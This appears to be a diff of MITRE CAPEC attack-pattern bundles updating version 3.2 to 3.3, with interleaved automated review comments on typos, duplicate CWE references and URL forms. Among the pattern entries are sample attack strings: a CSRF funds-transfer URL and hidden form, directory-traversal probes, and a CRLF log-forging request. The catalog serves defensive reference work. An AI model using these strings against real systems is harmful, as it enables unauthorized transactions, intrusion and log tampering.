"The victim system must allow Lan Man or NT Lan Man authentication."
|
||||
"The system/application is connected to the Windows domain.",
|
||||
"The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.",
|
||||
"The adversary possesses known Windows credential hash value pairs that exist on the target domain."
|
||||
],
|
||||
"x_capec_resources_required": [
|
||||
"A list of known Window credential hash value pairs for the targeted domain."
|
||||
],
|
||||
"x_capec_skills_required": {
|
||||
"High": "The adversary uses a third-party tool to obtain hashed credentials to execute the attack.",
|
||||
"Low": "Determine if Lan Man and NT Lan Man authentication is allowed on the server."
|
||||
"Low": "Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial."
|
||||
},
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
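Review bot: The expanded `external_references` array lists CWE-308 twice; the `@@ -21,6 +21,62 @@` hunk removes nothing, so both `{"source_name": "cwe", "url": "http://cwe.mitre.org/data/definitions/308.html", "external_id": "CWE-308"}` entries are newly added and one should be dropped, and a uniqueness check on `source_name` plus `external_id` in the exporter would catch this class of duplicate. REF-581 and REF-582 have different titles but the identical `url`; one of them is presumably mis-linked and should be confirmed against the CAPEC source. In `x_capec_resources_required`, `Window credential` should be `Windows credential`.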
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--ec85441c-ae7c-4dec-9522-5848f07bbacf",
|
||||
"id": "bundle--ba6f329c-27a7-4080-b2e6-b04d79c18ac6",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,9 +8,9 @@
|
||||
"id": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Use of Captured Tickets (Pass The Ticket)",
|
||||
"description": "An adversary uses stolen Kerberos tickets to access systems that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.",
|
||||
"description": "An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.",
|
||||
"external_references": [
|
||||
{
|
||||
"source_name": "capec",
|
||||
@@ -21,6 +21,28 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/522.html",
|
||||
"external_id": "CWE-522"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/294.html",
|
||||
"external_id": "CWE-294"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/308.html",
|
||||
"external_id": "CWE-308"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Use Alternate Authentication Material:Pass The Ticket",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1550/003",
|
||||
"external_id": "T1550.003"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks\u00ae Counter Threat Unit\u2122 Threat Intelligence",
|
||||
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
|
||||
"external_id": "REF-584"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -32,6 +54,9 @@
|
||||
"Gain Privileges"
|
||||
]
|
||||
},
|
||||
"x_capec_example_instances": [
|
||||
"Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]"
|
||||
],
|
||||
"x_capec_likelihood_of_attack": "Low",
|
||||
"x_capec_prerequisites": [
|
||||
"The adversary needs physical access to the victim system.",
|
||||
@@ -43,7 +68,7 @@
|
||||
},
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
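Review bot: The ATT&CK entry added in this section uses the legacy path `https://attack.mitre.org/wiki/Technique/T1550/003`; the canonical sub-technique URL is `https://attack.mitre.org/techniques/T1550/003/`, and the same legacy form is used by the three ATT&CK entries in the Remote Services with Stolen Credentials section (T1114.002, T1021, T1133). The new `cwe` entries link over `http://` although cwe.mitre.org serves HTTPS; tooling that follows these references would be better served by `https://cwe.mitre.org/data/definitions/522.html` and likewise for 294 and 308. The prerequisite `The adversary needs physical access to the victim system.` looks like a context line, but it now sits next to a new example describing forged TGT/TGS tickets used to retain administrative access, which involves no physical access; if the intended meaning is access to a host or account that holds ticket material, rewording the prerequisite would keep it consistent with the example.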
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--ae43321d-dce8-4760-b904-a366518531f2",
|
||||
"id": "bundle--fa7f02c2-1411-4c6c-b2f5-74d1b14f6b4c",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -29,7 +29,7 @@
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--61494309-9e38-4396-ae0c-a94de1579501",
|
||||
"id": "bundle--3e79cf89-5306-4c36-8623-10468c19dabd",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2015-11-09T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Remote Services with Stolen Credentials",
|
||||
"description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.",
|
||||
"external_references": [
|
||||
@@ -21,19 +21,67 @@
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/522.html",
|
||||
"external_id": "CWE-522"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/308.html",
|
||||
"external_id": "CWE-308"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/309.html",
|
||||
"external_id": "CWE-309"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/294.html",
|
||||
"external_id": "CWE-294"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/263.html",
|
||||
"external_id": "CWE-263"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/262.html",
|
||||
"external_id": "CWE-262"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/521.html",
|
||||
"external_id": "CWE-521"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Email Collection:Remote Email Collection",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1114/002",
|
||||
"external_id": "T1114.002"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Remote Services",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1021",
|
||||
"external_id": "T1021"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "External Remote Services",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1133",
|
||||
"external_id": "T1133"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
|
||||
],
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_abstraction": "Standard",
|
||||
"x_capec_example_instances": [
|
||||
"Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.",
|
||||
"Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell."
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Very High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
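Review bot: The example instance on Windows Remote Management is not reflected in the description, which still enumerates only `RDP, telnet, SSH, and VNC`; no per-line markers survive so I cannot tell whether that example is new here, but either way the description should name it, e.g. `remote services such as RDP, WinRM, telnet, SSH, and VNC`. The abstraction moves from `Detailed` to `Standard` in the same hunk; consumers keyed on `x_capec_abstraction` would benefit from a sentence in the commit description explaining the reclassification. Among the new ATT&CK references, `T1114.002` (Remote Email Collection) is a collection technique rather than a remote-access one, so please confirm that mapping is intended alongside T1021 and T1133.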
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--557ec773-bd41-4672-a7ab-4f83b3c1b24c",
|
||||
"id": "bundle--494d9f5e-f8f1-4f64-a658-53fa38857dbc",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -23,7 +23,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Meta",
|
||||
"x_capec_status": "Deprecated",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--89bebfbc-a59f-45f8-8b2b-96880105756c",
|
||||
"id": "bundle--8c2f388d-5d54-440a-aa3b-6ae6f358cb02",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -72,7 +72,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--64f7264d-86d3-4856-9518-a34457cac57b",
|
||||
"id": "bundle--aaea70ec-62a3-4dc9-a5d8-a8f1d9c31700",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Using Escaped Slashes in Alternate Encoding",
|
||||
"description": "This attack targets the use of the backslash in alternate encoding. An attacker can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the attacker tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.",
|
||||
"external_references": [
|
||||
@@ -111,6 +111,7 @@
|
||||
"\n <xhtml:p>For example, the byte pair \\0 might result in a single zero byte (a NULL) being sent. Another example is \\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">/ yields /\\/ yields /</xhtml:div>\n ",
|
||||
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Attack Example: Escaped Slashes in Alternate Encodings</xhtml:div>\n <xhtml:p>An attack leveraging this pattern is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">CWD ..\\/..\\/..\\/..\\/winnt</xhtml:div>\n <xhtml:p>which converts in many cases to</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">CWD ../../../../winnt</xhtml:div>\n <xhtml:p>To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">int main(int argc, char* argv[]){<xhtml:div style=\"margin-left:10px;\">puts(\"\\/ \\\\ \\? \\. \\| \");return 0;</xhtml:div>\n }</xhtml:div>\n <xhtml:p>produces the output</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">/ \\ ? . |</xhtml:div>\n <xhtml:p>Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">CWD ..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt</xhtml:div>\n "
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Experiment</h3><ol><li> <p>The attacker can send input data to the host target (e.g., via http request or command line request</p></li><li> <p>The attacker craft malicious input data which includes escaped slashes. The attacker may need multiple attempts before finding a successful combination.</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"The application accepts the backlash character as escape character.",
|
||||
@@ -122,7 +123,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
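Review bot: The prerequisite `The application accepts the backlash character as escape character.` has a typo (`backlash` should be `backslash`), and the execution flow's first Experiment step `(e.g., via http request or command line request` is missing its closing parenthesis while the second reads `The attacker craft malicious input data` rather than `crafts`. These appear to be context lines rather than ones this commit touches, but since the pattern's text is being revised anyway they are cheap to fix in the same pass.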
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--a5513950-fdb7-437c-9d8f-160e801eaa3f",
|
||||
"id": "bundle--6e6fbadf-91b6-4067-a5be-fad2e08a7cfe",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-09-30T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Manipulating Writeable Configuration Files",
|
||||
"description": "Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.",
|
||||
"external_references": [
|
||||
@@ -85,7 +85,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Very High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--063078a1-2ebb-4ef1-b0c0-6fe61e1d2489",
|
||||
"id": "bundle--1c796a0d-829d-47ab-ab04-8b4a8a7e7a68",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Cross Site Request Forgery",
|
||||
"description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.",
|
||||
"external_references": [
|
||||
@@ -42,6 +42,11 @@
|
||||
"url": "http://cwe.mitre.org/data/definitions/716.html",
|
||||
"external_id": "CWE-716"
|
||||
},
|
||||
{
|
||||
"source_name": "cwe",
|
||||
"url": "http://cwe.mitre.org/data/definitions/1275.html",
|
||||
"external_id": "CWE-1275"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH",
|
||||
@@ -72,8 +77,9 @@
|
||||
]
|
||||
},
|
||||
"x_capec_example_instances": [
|
||||
"\n <xhtml:p>While a user is logged into his bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.</xhtml:p>\n <xhtml:p>The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.</xhtml:p>\n <xhtml:p>The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.</xhtml:p>See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail."
|
||||
"\n <xhtml:p>While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.</xhtml:p>\n <xhtml:p>The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.</xhtml:p>\n <xhtml:p>The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.</xhtml:p>See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail."
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Explore target website: </b>The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server</td></tr><tr><td>Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server</td></tr><tr><td>View HTML source of web pages that contain links or buttons that perform actions of interest.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Create a link that when clicked on, will execute the interesting functionality.: </b>The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)</td></tr><tr><td>Create a form that will submit a POST request (e.g. 
<form method=\"POST\" action=\"https://www.somebank.com/members/transfer.asp\"><input type=\"hidden\" Name=\"to\" value=\"012345678901\"/><input type=\"hidden\" Name=\"amt\" value=\"10000\"/><input type=\"submit\" src=\"clickhere.jpg\"/></form></td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Convince user to click on link: </b>Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Execute a phishing attack and send the user an e-mail convincing them to click on a link.</td></tr><tr><td>Execute a stored XSS attack on a website to permanently embed the malicious link into the website.</td></tr><tr><td>Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.</td></tr><tr><td>Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.</td></tr></tbody></table></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_resources_required": [
|
||||
"All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim."
|
||||
@@ -83,7 +89,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Very High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
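Review bot: The rewritten example instance still reads `based on the victims existing session cookie`; it should be `victim's existing session cookie`, and the pronoun edit already made to this line is the natural place to carry that fix. The execution flow string appears to break across two lines at `(e.g. ` / `<form method=`, whereas every other line break inside these fields is written as an escaped `\n`; if that break is genuinely in the file rather than a rendering wrap, it is an unescaped control character that RFC 8259 parsers reject. The same mid-string break shows up in the Log Injection execution flow (`(for example). ` / `Different applications`) and in the Web Application Fingerprinting one (`SQL injection. ` / `Some database API`), so a strict-parser validation pass over the bundles (for example `python -m json.tool`) before tagging the release would settle it.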
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--4b00e7f5-2f22-4ab0-b02e-80b3b76ead68",
|
||||
"id": "bundle--a9c546dd-09fc-4bf9-b108-61ead9f65acc",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -37,7 +37,7 @@
|
||||
"The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area."
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--9931f79f-4a2a-40f9-ab88-040946627ede",
|
||||
"id": "bundle--b5c127e1-8907-4791-aada-f584194f54ba",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -60,7 +60,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--0e4d5e30-2629-4eb1-a4bb-ce7f2510e55a",
|
||||
"id": "bundle--dca3cf90-2537-4c6b-b8ad-4d79dcdfa44e",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -90,6 +90,7 @@
|
||||
"x_capec_example_instances": [
|
||||
"Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network."
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Determine Application Web Server Log File Format: </b>The attacker observes the system and looks for indicators of which logging utility is being used by the web server.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Determine Injectable Content: </b>The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Manipulate Log Files: </b>The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>\n <xhtml:p>Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.</xhtml:p>\n <xhtml:p>For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). 
Different applications may require different encodings of the carriage return and line feed characters.</xhtml:p>\n </td></tr><tr><td>\n <xhtml:p>Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.</xhtml:p>\n <xhtml:p>For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.</xhtml:p>\n </td></tr><tr><td>Directly through log file or database manipulation, modify existing log entries.</td></tr></tbody></table></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "Medium",
|
||||
"x_capec_prerequisites": [
|
||||
"Target server software must be a HTTP server that performs web logging."
|
||||
@@ -102,7 +103,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
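Review bot: In the execution flow's Exploit section, the second technique row opens with `Directly through log file or database manipulation` but then repeats verbatim the HTTP-request example from the first row (`/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] ...`), which is an indirect-injection example; the row should either describe direct modification of stored entries, as the third row already does, or drop the duplicated example. This looks like a context line rather than one the commit changes, but the duplication makes the two techniques read as identical to anyone consuming the flow.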
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--f923046d-910c-4bd0-bce5-1eecb474d078",
|
||||
"id": "bundle--17cf7306-d1b1-4c31-bcbf-05b2e1a52759",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-04-04T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Web Application Fingerprinting",
|
||||
"description": "An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.",
|
||||
"external_references": [
|
||||
@@ -57,8 +57,9 @@
|
||||
]
|
||||
},
|
||||
"x_capec_example_instances": [
|
||||
